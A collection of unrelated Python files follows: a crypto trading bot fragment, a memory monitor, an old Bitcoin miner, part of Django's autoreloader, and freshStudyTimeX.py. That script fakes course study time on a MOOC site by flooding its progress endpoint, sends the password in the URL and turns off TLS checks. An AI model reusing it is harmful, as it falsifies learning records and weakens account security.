    Nudges the best bid up (and the best ask down) by a small random
    multiple of the market's minimum price tick, rounded to the market's
    price precision, so our orders sit at the front of the book.
    """
    book = exchange.fetch_order_book(symbol.symbol)
    tick = symbol.limits['price']['min']
    digits = symbol.precision['price']
    bid = round(book['bids'][0][0] + tick * randint(2, 5), digits)
    ask = round(book['asks'][0][0] - tick * randint(2, 5), digits)
    return bid, ask
def order_status(order_id, symbol):
    """Fetch an order and classify it, returning (status, filled, remaining).

    An open order with a non-zero fill is reported as the synthetic status
    'parted' so callers can handle partial fills separately.
    """
    order = exchange.fetch_order(order_id, symbol.symbol)
    status = order['status']
    filled = order['filled']
    remaining = order['remaining']
    if filled > 0 and status == 'open':
        status = 'parted'
    return status, filled, remaining
def buy(algo, symbol, panic=0):
    """Place a limit buy for *symbol* and babysit the order until it resolves.

    Arguments:
      algo: strategy tag ('HF', 'TA', 'ML', ...) used for logging and totals.
      symbol: Symbol wrapper around the ccxt market description.
      panic: recursion depth; each retry re-enters buy() with panic+1 and
        the attempt is abandoned after PANIC_COUNT levels.
    """
    if symbol is None:
        return
    panic += 1
    if panic > PANIC_COUNT:
        # Too many nested retries for this buy; give up.
        return
    try:
        buy_price, sell_price = price_calculate(symbol)
        # Round the configured budget down to a whole multiple of the
        # market's minimum amount step.
        amount = round(int(float(config['CONFIG']['BUDGET']) / buy_price / symbol.limits['amount']['min'])
                       * symbol.limits['amount']['min'], symbol.precision['amount'])
        if amount < symbol.limits['amount']['min']:
            return
        if amount * buy_price < symbol.limits['cost']['min']:
            return
        balance = exchange.fetch_balance()
        # Already holding at least the target amount: nothing to buy.
        if balance['total'][symbol.base] >= amount:
            return
        log('%s %s buy amount:%.8f price:%.8f total:%.8f'
            % (symbol.symbol, algo, amount, buy_price, amount * buy_price))
        order = exchange.create_limit_buy_order(symbol.symbol, amount, buy_price)
        time.sleep(1)
        order_id = order['id']
        panic_buy = 0
        while True:
            status, filled, remaining = order_status(order_id, symbol)
            if status == 'open':
                panic_buy += 1
                if panic_buy > PANIC_COUNT:
                    # Unfilled for too long: cancel and retry at a fresh price.
                    exchange.cancel_order(order_id, symbol.symbol)
                    time.sleep(1)
                    buy(algo, symbol, panic)
                    break
                else:
                    time.sleep(1)
                    continue
            elif status == 'parted':
                log('%s %s buy partially filled, amount:%.8f' % (symbol.symbol, algo, filled))
                panic_buy += 1
                if panic_buy > PANIC_COUNT:
                    # Keep the filled part, cancel the resting remainder.
                    exchange.cancel_order(order_id, symbol.symbol)
                    save_buy_total(algo, symbol, filled, buy_price)
                else:
                    time.sleep(1)
                    continue
            elif status == 'closed':
                log('%s %s buy filled, amount:%.8f' % (symbol.symbol, algo, amount))
                save_buy_total(algo, symbol, amount, buy_price)
            else:
                log('%s %s buy failed, status:%s' % (symbol.symbol, algo, status))
                exchange.cancel_order(order_id, symbol.symbol)
            # High-frequency strategy immediately flips into a sell.
            if algo == 'HF':
                sell(algo, symbol)
            break
    except Exception as e:
        log('{} error: {}'.format(symbol.symbol, str(e)))
    return
def sell(algo, symbol):
    """Place a limit sell for the free balance of *symbol* and babysit it.

    Retries by recursing into sell() when the order lingers, records totals
    via save_sell_total(), and logs the realised profit against the last
    recorded buy price.
    """
    if symbol is None:
        return
    try:
        buy_price, sell_price = price_calculate(symbol)
        balance = exchange.fetch_balance()
        # Sell the whole free balance, rounded down to the amount step.
        amount = round(int(balance['free'][symbol.base] / symbol.limits['amount']['min'])
                       * symbol.limits['amount']['min'], symbol.precision['amount'])
        if amount < symbol.limits['amount']['min']:
            return
        if amount * sell_price < symbol.limits['cost']['min']:
            return
        log('%s %s sell amount:%.8f price:%.8f total:%.8f'
            % (symbol.symbol, algo, amount, sell_price, amount * sell_price))
        order = exchange.create_limit_sell_order(symbol.symbol, amount, sell_price)
        time.sleep(1)
        order_id = order['id']
        panic_sell = 0
        while True:
            status, filled, remaining = order_status(order_id, symbol)
            if status == 'open':
                panic_sell += 1
                if panic_sell > PANIC_COUNT:
                    # Unfilled for too long: cancel and retry at a fresh price.
                    exchange.cancel_order(order_id, symbol.symbol)
                    time.sleep(1)
                    sell(algo, symbol)
                else:
                    time.sleep(1)
                    continue
            elif status == 'parted':
                log('`%s %s sell partially filled, amount:%.8f`' % (symbol.symbol, algo, filled))
                panic_sell += 1
                if panic_sell > PANIC_COUNT:
                    # Book the filled part, then retry selling the remainder.
                    exchange.cancel_order(order_id, symbol.symbol)
                    save_sell_total(algo, symbol, filled, sell_price)
                    buy_price = get_buy_price(symbol)
                    if buy_price > 0:
                        log('`%s %s possible profit: %.8f %.2f%%`' %
                            (symbol.symbol, algo, (sell_price - buy_price) * filled, (sell_price / buy_price - 1) * 100))
                    time.sleep(1)
                    sell(algo, symbol)
                else:
                    time.sleep(1)
                    continue
            elif status == 'closed':
                log('`%s %s sell filled, amount:%.8f`' % (symbol.symbol, algo, amount))
                save_sell_total(algo, symbol, amount, sell_price)
                buy_price = get_buy_price(symbol)
                if buy_price > 0:
                    log('`%s %s possible profit: %.8f %.2f%%`' %
                        (symbol.symbol, algo, (sell_price - buy_price) * amount, (sell_price / buy_price - 1) * 100))
                    # HF strategy re-enters after a >1% profitable exit.
                    if algo == 'HF' and (sell_price / buy_price - 1) * 100 > 1:
                        buy(algo, symbol)
            else:
                log('%s sell failed, status:%s' % (symbol.symbol, status))
                exchange.cancel_order(order_id, symbol.symbol)
            break
    except Exception as e:
        log('{} error: {}'.format(symbol.symbol, str(e)))
    return
def handler(message):
    """Redis pub/sub callback: dispatch a buy/sell job to a worker thread.

    Channel names look like '<algo>_<side>' (e.g. 'ta_buy'); the payload is
    the market symbol to trade.
    """
    payload = message['data'].decode('latin1')
    channel = message['channel'].decode('latin1')
    market = Symbol(exchange.market(payload))
    algo = channel.split('_')[0].upper()
    side = channel.split('_')[1]
    if side == 'buy':
        threading.Thread(target=buy, args=(algo, market)).start()
    elif side == 'sell':
        threading.Thread(target=sell, args=(algo, market)).start()
def main():
    """Subscribe to trade-signal channels and pump messages for CRON_TIME minutes.

    On exit, any orders still resting on the book are cancelled.
    """
    log('*{} started*'.format(BOT_NAME))
    start_time = time.time()
    exchange.load_markets(reload=True)
    # Make sure there is BNB on hand to pay trading fees.
    buy_bnb()
    p = rd.pubsub(ignore_subscribe_messages=True)
    # One channel per (strategy, side); all dispatch through handler().
    p.subscribe(**{'stop_sell': handler})
    p.subscribe(**{'hf_buy': handler})
    p.subscribe(**{'ta_buy': handler})
    p.subscribe(**{'ta_sell': handler})
    p.subscribe(**{'ml_buy': handler})
    p.subscribe(**{'ml_sell': handler})
    current_time = time.time()
    while current_time - start_time < 60 * CRON_TIME:
        p.get_message()
        time.sleep(1)
        current_time = time.time()
    # Run window over: clear anything still resting on the book.
    for order in exchange.fetch_open_orders():
        exchange.cancel_order(order['id'], order['symbol'])


if __name__ == "__main__":
    main()
|
monitor.py | """Tools for monitoring processing status and memory usage by ceci pipelines"""
import time
import psutil
import threading
import datetime
class MemoryMonitor:
    """
    A monitor which reports on memory usage by this process throughout the
    lifetime of a process.

    The monitor is designed to be run in a thread, which is done automatically
    in the start_in_thread method, and will then continue until either the
    main thread ends or the stop method is called from another thread.

    To print out different process information you can subclass and override
    the log method.
    """

    def __init__(self, interval=30):
        """Create a memory monitor.

        Parameters
        ----------
        interval: float or int
            The interval in seconds between each report.
            Default is 30 seconds
        """
        # Checked once per interval by _run(); cleared by stop().
        self.should_continue = True
        self.interval = interval
        self.process = psutil.Process()

    @classmethod
    def start_in_thread(cls, *args, **kwargs):
        """Create a new thread and run the memory monitor in it.

        For parameters, see the init method; all arguments sent to this
        method are passed directly to it.

        Returns
        -------
        monitor: MemoryMonitor
            The monitor, already running in its own thread
        """
        monitor = cls(*args, **kwargs)
        # Fix: run as a daemon thread. A non-daemon monitor thread kept the
        # interpreter alive for up to `interval` seconds after the main
        # thread finished, because _run() only notices main-thread exit when
        # its sleep ends.
        thread = threading.Thread(target=monitor._run, daemon=True)
        thread.start()
        return monitor

    def stop(self):
        """Stop the monitor.

        The monitor will complete its current sleep interval and then end.

        Parameters
        ----------
        None

        Returns
        -------
        None
        """
        self.should_continue = False

    @staticmethod
    def log(p):
        """Print memory usage information to screen.

        Parameters
        ----------
        p: Process
            A psutil process
        """
        mem = p.memory_info()
        # Report time since start of process.
        dt = datetime.timedelta(seconds=time.time() - p.create_time())
        # Various memory figures, converted to GB.
        rss = mem.rss / 1e9
        vms = mem.vms / 1e9
        avail = psutil.virtual_memory().available / 1e9
        # For now I don't use the python logging mechanism, but
        # at some point should probably switch to that.
        print(
            f"MemoryMonitor Time: {dt} Physical mem: {rss:.3f} GB "
            f"Virtual mem: {vms:.3f} GB "
            f"Available mem: {avail:.1f} GB"
        )

    def _run(self):
        # There are two ways to stop the monitor - it ends automatically
        # when the main thread completes, and it can be stopped manually
        # with the stop method. Check for both.
        while threading.main_thread().is_alive():
            if not self.should_continue:
                break
            self.log(self.process)
            time.sleep(self.interval)
|
freshStudyTimeX.py | # coding=utf-8
#!/usr/bin/python3
import requests
import configparser
import threading
import os
import sys
from requests.api import get
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# Read the configuration file with the account credentials.
config = configparser.ConfigParser()
config.read('config.ini')
name = config.get('info', 'name')
pwd = config.get('info', 'pwd')
# Session cookies harvested by getCookie() and shared by the worker threads.
cookieall = ""
cookies = []
# Login endpoint: credentials are passed as query-string parameters.
loginurl = "https://aq.fhmooc.com/api/common/Login/login?schoolId=wtsoawgsg6nln8gez7e4g&userName=" + \
    name+"&userPwd="+pwd+""
# Endpoint that records accumulated study time for a course cell.
url = "https://aq.fhmooc.com/api/design/LearnCourse/statStuProcessCellLogAndTimeLong"
def freshStudyTimeThread():
    """Worker thread: repeatedly POST the study-time heartbeat request.

    Builds a cookie header from the session cookies collected by
    getCookie() and reports progress for a fixed course/cell 299 times.
    """
    # NOTE(review): assumes getCookie() stored ASP.NET_SessionId first and
    # auth second in `cookies` — confirm against the login response order.
    cookieall = "schoolId=; userName=; userPwd=-1; ASP.NET_SessionId=" + \
        cookies[0]+"; auth="+cookies[1]
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
        "Cookie": cookieall,
        "Referer": "https://aq.fhmooc.com/catalogPreview/amifawcspkfh3ziyldznq/zbsnahys77pfqqrf5kf2eq/yavahys45zi6srusezpva",
        "videoTimeTotalLong": "0"
    }
    # Fixed identifiers of the course/module/cell being "watched".
    data = {
        "courseId": "qkcfawcsxyrom0zrwghhwq",
        "moduleIds": "amifawcspkfh3ziyldznq",
        "cellId": "yavahys45zi6srusezpva",
        "auvideoLength": "0"
    }
    print(cookieall)
    for i in range(1, 300):
        res = requests.post(url, headers=header, data=data)
        # The API answers with "code":1 on success.
        if "\"code\":1" in res.text:
            print(threading.current_thread().name +
                  " time:" + str(i) + " ok")
        else:
            print(threading.current_thread().name +
                  " time:" + str(i) + " ERROR")
def getCookie():
    """Log in once and collect the session cookies into the global `cookies` list."""
    Hostreferer = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'
    }
    # urllib/requests verify TLS certificates for https sites by default;
    # the simple workaround here is to pass verify=False to get().
    html = requests.get(loginurl, headers=Hostreferer, verify=False)
    # Collect the session cookies (e.g. DZSW_WSYYT_SESSIONID).
    if html.status_code == 200:
        for tcookie in html.cookies:
            cookies.append(tcookie.value)
def main():
    """Log in once, then drive the study-time endpoint from three threads."""
    # Fetch the session cookies shared by all worker threads.
    getCookie()
    # written by Polarisjl 2021.12.15
    t0 = threading.Thread(target=freshStudyTimeThread, name='Thread0')
    t1 = threading.Thread(target=freshStudyTimeThread, name='Thread1')
    t2 = threading.Thread(target=freshStudyTimeThread, name='Thread2')
    t0.start()
    t1.start()
    t2.start()


if __name__ == '__main__':
    main()
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file license.txt or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15  # seconds to back off after an RPC failure
MAX_NONCE = 1000000L  # initial nonce scan range per getwork round
settings = {}  # populated from the config file in __main__
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client for a bitcoind node (HTTP basic auth)."""
    OBJID = 1

    def __init__(self, host, port, username, password):
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        # Plain HTTP, 30-second timeout (local RPC endpoint).
        self.conn = httplib.HTTPConnection(host, port, False, 30)

    def rpc(self, method, params=None):
        """POST one JSON-RPC call; return its result, its error dict, or None."""
        # Incrementing via the instance shadows the class attribute with a
        # per-instance request id on first use.
        self.OBJID += 1
        obj = { 'version' : '1.1',
            'method' : method,
            'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })
        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None
        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None
        return resp_obj['result']

    def getblockcount(self):
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        return self.rpc('getwork', data)
def uint32(x):
    # Truncate x to an unsigned 32-bit value (Python 2 long).
    return x & 0xffffffffL
def bytereverse(x):
    # Reverse the byte order of a 32-bit word (endianness swap).
    return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
            (((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
    # Byte-swap every 32-bit word of the buffer in place order.
    out_words = []
    for i in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    # Reverse the order of the 32-bit words in the buffer.
    out_words = []
    for i in range(0, len(in_buf), 4):
        out_words.append(in_buf[i:i+4])
    out_words.reverse()
    return ''.join(out_words)
class Miner:
    """One getwork miner: scans a nonce range with double-SHA256 over the header."""

    def __init__(self, id):
        self.id = id
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces for the given work; return (hashes_done, winning_nonce_bin or None)."""
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)

        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]

        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        #print 'Target:', targetbin_str
        target = long(targetbin_str, 16)

        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)

        for nonce in xrange(self.max_nonce):

            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)

            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()

            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()

            # quick test for winning solution: high 32 bits zero?
            #if hash[-4:] != '\0\0\0\0':
            #if hash[-2:] != '\0\0':
            if hash[-3:] != '\0\0\0':
                continue

            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)

            hash_str = hash.encode('hex')
            l = long(hash_str, 16)

            # proof-of-work test:  hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                return (nonce + 1, nonce_bin)

        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce back into the work and send it upstream."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        """One round: fetch work, scan nonces, retune max_nonce, submit any solution."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return

        time_start = time.time()

        (hashes_done, nonce_bin) = self.work(work['data'],
                         work['target'])

        time_end = time.time()
        time_diff = time_end - time_start

        # Retune the scan range so one iteration takes ~scantime seconds.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL

        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                  self.id, hashes_done,
                  (hashes_done / 1000.0) / time_diff)

        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        """Mine forever against the configured RPC endpoint."""
        rpc = BitcoinRPC(settings['host'], settings['port'],
                 settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return

        while True:
            self.iterate(rpc)
def miner_thread(id):
    # Entry point for each worker process: mine indefinitely.
    miner = Miner(id)
    miner.loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    # Parse simple key=value config lines, skipping comments.
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # Fill in defaults for anything the config file omitted.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 8332
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # Normalise numeric settings (config values arrive as strings).
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    # One mining process per configured thread.
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads

    print settings['threads'], "mining threads started"
    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
autoreload.py | import functools
import itertools
import logging
import os
import pathlib
import signal
import subprocess
import sys
import threading
import time
import traceback
import weakref
from collections import defaultdict
from pathlib import Path
from types import ModuleType
from zipimport import zipimporter
from django.apps import apps
from django.core.signals import request_finished
from django.dispatch import Signal
from django.utils.functional import cached_property
from django.utils.version import get_version_tuple
# Signals fired when the reloader starts and when a watched file changes.
autoreload_started = Signal()
file_changed = Signal(providing_args=['file_path', 'kind'])

# Environment flag set in the child process spawned by restart_with_reloader().
DJANGO_AUTORELOAD_ENV = 'RUN_MAIN'

logger = logging.getLogger('django.utils.autoreload')

# If an error is raised while importing a file, it's not placed in sys.modules.
# This means that any future modifications aren't caught. Keep a list of these
# file paths to allow watching them in the future.
_error_files = []
# Last exc_info captured by check_errors(); re-raised by raise_last_exception().
_exception = None

# Optional platform / third-party dependencies.
try:
    import termios
except ImportError:
    termios = None

try:
    import pywatchman
except ImportError:
    pywatchman = None
def check_errors(fn):
    """Wrap *fn* so any exception it raises is recorded before re-raising.

    The captured exc_info goes into the module-global ``_exception`` (for
    raise_last_exception()) and the offending file is appended to
    ``_error_files`` so the reloader keeps watching files that failed to
    import.
    """
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        global _exception
        try:
            fn(*args, **kwargs)
        except Exception:
            _exception = sys.exc_info()
            _, exc_value, tb = _exception
            filename = getattr(exc_value, 'filename', None)
            if filename is None:
                # Fall back to the last frame of the traceback.
                filename = traceback.extract_tb(tb)[-1][0]
            if filename not in _error_files:
                _error_files.append(filename)
            raise
    return wrapper
def raise_last_exception():
    """Re-raise the exception captured by check_errors(), preserving its traceback."""
    global _exception
    if _exception is not None:
        exc_type, exc_value, tb = _exception
        raise exc_type(exc_value).with_traceback(tb)
def ensure_echo_on():
    """Re-enable terminal echo on stdin if a crashed child process left it off."""
    if termios:
        fd = sys.stdin
        if fd.isatty():
            attr_list = termios.tcgetattr(fd)
            if not attr_list[3] & termios.ECHO:
                attr_list[3] |= termios.ECHO
                if hasattr(signal, 'SIGTTOU'):
                    # Ignore SIGTTOU while a background process touches the tty.
                    old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)
                else:
                    old_handler = None
                termios.tcsetattr(fd, termios.TCSANOW, attr_list)
                if old_handler is not None:
                    signal.signal(signal.SIGTTOU, old_handler)
def iter_all_python_module_files():
    """Return the set of files backing every currently imported module.

    Hot path during reloading: build a deterministically sorted, hashable
    tuple of modules so the lru_cache on iter_modules_and_files() hits in
    the common case where no new modules were loaded.
    """
    by_name = sorted(sys.modules.items(), key=lambda item: item[0])
    modules = tuple(
        mod for _, mod in by_name if not isinstance(mod, weakref.ProxyTypes)
    )
    return iter_modules_and_files(modules, frozenset(_error_files))
@functools.lru_cache(maxsize=1)
def iter_modules_and_files(modules, extra_files):
    """Return the frozenset of resolved paths for *modules* plus *extra_files*."""
    origins = []
    for module in modules:
        # PyDev injects non-module objects (typing.io / typing.re) into
        # sys.modules; skip anything that isn't a real module with a spec.
        spec = getattr(module, '__spec__', None)
        if not isinstance(module, ModuleType) or spec is None:
            continue
        # Skip modules loaded without a concrete on-disk location.
        if not spec.has_location:
            continue
        loader = spec.loader
        origin = loader.archive if isinstance(loader, zipimporter) else spec.origin
        origins.append(origin)
    results = set()
    for filename in itertools.chain(origins, extra_files):
        if not filename:
            continue
        path = pathlib.Path(filename)
        # The file may have been removed; don't fail loudly if so.
        if path.exists():
            results.add(path.resolve().absolute())
    return frozenset(results)
@functools.lru_cache(maxsize=1)
def common_roots(paths):
    """
    Return a tuple of common roots that are shared between the given paths.

    File system watchers operate on directories and aren't cheap to create,
    so collapse the paths to the minimum set of ancestor directories that
    covers all of them.
    """
    # Longest paths first, so an ancestor inserted later truncates its
    # previously-added descendants.
    ordered = sorted((p.parts for p in paths), key=len, reverse=True)
    tree = {}
    for parts in ordered:
        node = tree
        for part in parts:
            node = node.setdefault(part, {})
        # An ancestor subsumes anything already recorded beneath it.
        node.clear()

    def walk(node, prefix):
        if not node:
            yield Path(*prefix)
            return
        for name, child in node.items():
            yield from walk(child, prefix + (name,))

    return tuple(walk(tree, ()))
def sys_path_directories():
    """
    Yield absolute directories from sys.path, ignoring entries that don't
    exist.
    """
    for entry in sys.path:
        candidate = Path(entry)
        if not candidate.exists():
            continue
        resolved = candidate.resolve().absolute()
        # Zip/egg entries are files; watch their containing directory instead.
        yield resolved.parent if resolved.is_file() else resolved
def get_child_arguments():
    """
    Return the argv used to re-spawn this process, preserving warning options
    and the `python -m django` invocation style when it was used.
    """
    import django.__main__
    args = [sys.executable]
    args += ['-W%s' % option for option in sys.warnoptions]
    if sys.argv[0] == django.__main__.__file__:
        # The server was started with `python -m django runserver`.
        args += ['-m', 'django']
        args += sys.argv[1:]
    else:
        args += sys.argv
    return args
def trigger_reload(filename):
    """Log the changed file and exit with code 3 so the parent loop restarts us."""
    logger.info('%s changed, reloading.', filename)
    sys.exit(3)
def restart_with_reloader():
    """Run the command in a child process until it exits with a non-reload code."""
    child_environ = {**os.environ, DJANGO_AUTORELOAD_ENV: 'true'}
    args = get_child_arguments()
    while True:
        exit_code = subprocess.call(args, env=child_environ, close_fds=False)
        # Exit code 3 is the sentinel written by trigger_reload(): restart.
        if exit_code != 3:
            return exit_code
class BaseReloader:
    """Common machinery shared by the stat- and watchman-based reloaders."""

    def __init__(self):
        # Individual files watched in addition to imported modules.
        self.extra_files = set()
        # Directory -> set of glob patterns watched beneath it.
        self.directory_globs = defaultdict(set)
        self._stop_condition = threading.Event()

    def watch_dir(self, path, glob):
        """Watch files matching *glob* under *path* (must be absolute)."""
        path = Path(path)
        if not path.is_absolute():
            raise ValueError('%s must be absolute.' % path)
        logger.debug('Watching dir %s with glob %s.', path, glob)
        self.directory_globs[path].add(glob)

    def watch_file(self, path):
        """Watch a single file (must be absolute)."""
        path = Path(path)
        if not path.is_absolute():
            raise ValueError('%s must be absolute.' % path)
        logger.debug('Watching file %s.', path)
        self.extra_files.add(path)

    def watched_files(self, include_globs=True):
        """
        Yield all files that need to be watched, including module files and
        files within globs.
        """
        yield from iter_all_python_module_files()
        yield from self.extra_files
        if include_globs:
            for directory, patterns in self.directory_globs.items():
                for pattern in patterns:
                    yield from directory.glob(pattern)

    def wait_for_apps_ready(self, app_reg, django_main_thread):
        """
        Wait until Django reports that the apps have been loaded. If the given
        thread has terminated before the apps are ready, then a SyntaxError or
        other non-recoverable error has been raised. In that case, stop waiting
        for the apps_ready event and continue processing.

        Return True if the thread is alive and the ready event has been
        triggered, or False if the thread is terminated while waiting for the
        event.
        """
        while django_main_thread.is_alive():
            if app_reg.ready_event.wait(timeout=0.1):
                return True
        else:
            logger.debug('Main Django thread has terminated before apps are ready.')
            return False

    def run(self, django_main_thread):
        logger.debug('Waiting for apps ready_event.')
        self.wait_for_apps_ready(apps, django_main_thread)
        from django.urls import get_resolver
        # Prevent a race condition where URL modules aren't loaded when the
        # reloader starts by accessing the urlconf_module property.
        try:
            get_resolver().urlconf_module
        except Exception:
            # Loading the urlconf can result in errors during development.
            # If this occurs then swallow the error and continue.
            pass
        logger.debug('Apps ready_event triggered. Sending autoreload_started signal.')
        autoreload_started.send(sender=self)
        self.run_loop()

    def run_loop(self):
        # Pump the subclass's tick() generator until stop() is requested.
        ticker = self.tick()
        while not self.should_stop:
            try:
                next(ticker)
            except StopIteration:
                break
        self.stop()

    def tick(self):
        """
        This generator is called in a loop from run_loop. It's important that
        the method takes care of pausing or otherwise waiting for a period of
        time. This split between run_loop() and tick() is to improve the
        testability of the reloader implementations by decoupling the work they
        do from the loop.
        """
        raise NotImplementedError('subclasses must implement tick().')

    @classmethod
    def check_availability(cls):
        raise NotImplementedError('subclasses must implement check_availability().')

    def notify_file_changed(self, path):
        results = file_changed.send(sender=self, file_path=path)
        logger.debug('%s notified as changed. Signal results: %s.', path, results)
        # If no signal receiver handled the change, restart the process.
        if not any(res[1] for res in results):
            trigger_reload(path)

    # These are primarily used for testing.
    @property
    def should_stop(self):
        return self._stop_condition.is_set()

    def stop(self):
        self._stop_condition.set()
class StatReloader(BaseReloader):
    """Fallback reloader that polls file modification times."""

    SLEEP_TIME = 1  # Check for changes once per second.

    def tick(self):
        # mtime of each file when it was first seen; a later, larger mtime
        # means the file changed and a reload should be triggered.
        first_seen = {}
        while True:
            for filepath, current in self.snapshot_files():
                earlier = first_seen.get(filepath)
                if earlier is None:
                    logger.debug('File %s first seen with mtime %s', filepath, current)
                    first_seen[filepath] = current
                elif current > earlier:
                    logger.debug(
                        'File %s previous mtime: %s, current mtime: %s',
                        filepath, earlier, current,
                    )
                    self.notify_file_changed(filepath)
            time.sleep(self.SLEEP_TIME)
            yield

    def snapshot_files(self):
        # watched_files may yield duplicates when globs overlap; dedupe here.
        yielded = set()
        for path in self.watched_files():
            if path in yielded:
                continue
            try:
                mtime = path.stat().st_mtime
            except OSError:
                # The file vanished between listing and stat(); skip it.
                continue
            yielded.add(path)
            yield path, mtime

    @classmethod
    def check_availability(cls):
        return True
class WatchmanUnavailable(RuntimeError):
    """Raised when the watchman service cannot be reached or is too old."""
    pass
class WatchmanReloader(BaseReloader):
def __init__(self):
self.roots = defaultdict(set)
self.processed_request = threading.Event()
self.client_timeout = int(os.environ.get('DJANGO_WATCHMAN_TIMEOUT', 5))
super().__init__()
@cached_property
def client(self):
return pywatchman.client(timeout=self.client_timeout)
def _watch_root(self, root):
# In practice this shouldn't occur, however, it's possible that a
# directory that doesn't exist yet is being watched. If it's outside of
# sys.path then this will end up a new root. How to handle this isn't
# clear: Not adding the root will likely break when subscribing to the
# changes, however, as this is currently an internal API, no files
# will be being watched outside of sys.path. Fixing this by checking
# inside watch_glob() and watch_dir() is expensive, instead this could
# could fall back to the StatReloader if this case is detected? For
# now, watching its parent, if possible, is sufficient.
if not root.exists():
if not root.parent.exists():
logger.warning('Unable to watch root dir %s as neither it or its parent exist.', root)
return
root = root.parent
result = self.client.query('watch-project', str(root.absolute()))
if 'warning' in result:
logger.warning('Watchman warning: %s', result['warning'])
logger.debug('Watchman watch-project result: %s', result)
return result['watch'], result.get('relative_path')
@functools.lru_cache()
def _get_clock(self, root):
return self.client.query('clock', root)['clock']
def _subscribe(self, directory, name, expression):
root, rel_path = self._watch_root(directory)
query = {
'expression': expression,
'fields': ['name'],
'since': self._get_clock(root),
'dedup_results': True,
}
if rel_path:
query['relative_root'] = rel_path
logger.debug('Issuing watchman subscription %s, for root %s. Query: %s', name, root, query)
self.client.query('subscribe', root, name, query)
def _subscribe_dir(self, directory, filenames):
if not directory.exists():
if not directory.parent.exists():
